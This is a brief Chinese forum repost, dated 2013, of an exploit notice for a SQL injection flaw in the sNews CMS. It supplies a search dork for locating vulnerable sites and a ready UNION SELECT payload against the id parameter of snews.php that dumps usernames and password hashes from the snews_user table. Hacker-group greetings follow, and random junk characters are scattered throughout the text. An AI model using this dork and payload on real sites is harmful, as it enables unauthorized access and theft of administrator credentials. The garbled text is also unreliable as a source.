标题: CMS snews SQL Injection Vulnerability
* l) z! ?- t6 E/ h' B作者: By onestree3 |/ K: E, H3 Z
下载地址 : http://snewscms.com/. q4 u$ W( e# g$ ~
测试平台 : ubuntu 12.10 / win 7 t. K: s( J8 k( d
关键词: inurl:"tanyakan pada rumput yang bergoyang"0 T* ^- D6 Z j" u$ s
1 Q+ |0 O6 m, h; ]6 v; M' F+ } $ F9 y5 C* a) M, Z( S
*************************************************************
/ l5 O+ S0 p+ Q N- Z% Y H
+ Y( y8 `( L2 e9 PSQL poc:- {/ G8 y" U6 C
0 M; T- p5 [% Z) Hhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
$ e+ I7 m3 S2 l4 m : h- E7 F3 S+ O: v) `) J
示例& C, ]4 g2 I0 B: X( v$ Z
# u/ }4 d: W; T2 r8 Z
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/** R; V/ Y& T2 o0 T
% G, n- O. J% G/ P
, U# c& ~3 Q4 _2 t) F0 f& O致谢:
; a' Z9 h5 p; D 1 S7 Z% Z+ f+ V, J- _" [7 j: ^
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell7 K: y* ~; c; F- G2 N
. J1 g: [) ]0 V3 \2 `7 E4 | indonesiancoder - moeslimh4x0r - go-coder
$ `" E5 I @% W( I& N3 j Z
' A: e9 V2 @8 W! n. n- @; Q/ w Jspesial my hunny :*
' x( G9 N: g8 l# c |
发表于 2013-1-23 08:55:06
收藏
支持
反对